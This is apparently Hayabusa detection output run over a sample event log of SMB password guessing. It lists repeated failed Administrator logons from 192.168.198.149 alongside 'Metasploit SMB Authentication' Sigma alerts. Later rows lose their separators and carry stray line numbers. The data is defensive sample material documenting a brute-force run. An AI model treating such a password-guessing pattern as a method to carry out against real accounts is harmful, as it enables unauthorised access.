2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13972016-09-20 01:50:13.447 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13982016-09-20 01:50:13.487 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
13992016-09-20 01:50:13.487 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14002016-09-20 01:50:13.528 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14012016-09-20 01:50:13.528 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14022016-09-20 01:50:13.564 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14032016-09-20 01:50:13.564 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14042016-09-20 01:50:13.612 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14052016-09-20 01:50:13.612 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14062016-09-20 01:50:13.652 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14072016-09-20 01:50:13.652 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14082016-09-20 01:50:13.683 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14092016-09-20 01:50:13.683 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14102016-09-20 01:50:13.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14112016-09-20 01:50:13.720 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14122016-09-20 01:50:13.759 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14132016-09-20 01:50:13.759 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14142016-09-20 01:50:13.796 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14152016-09-20 01:50:13.796 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14162016-09-20 01:50:13.834 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14172016-09-20 01:50:13.834 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14182016-09-20 01:50:13.860 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14192016-09-20 01:50:13.860 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14202016-09-20 01:50:13.895 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14212016-09-20 01:50:13.895 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14222016-09-20 01:50:13.935 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14232016-09-20 01:50:13.935 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14242016-09-20 01:50:13.976 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
14252016-09-20 01:50:13.976 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
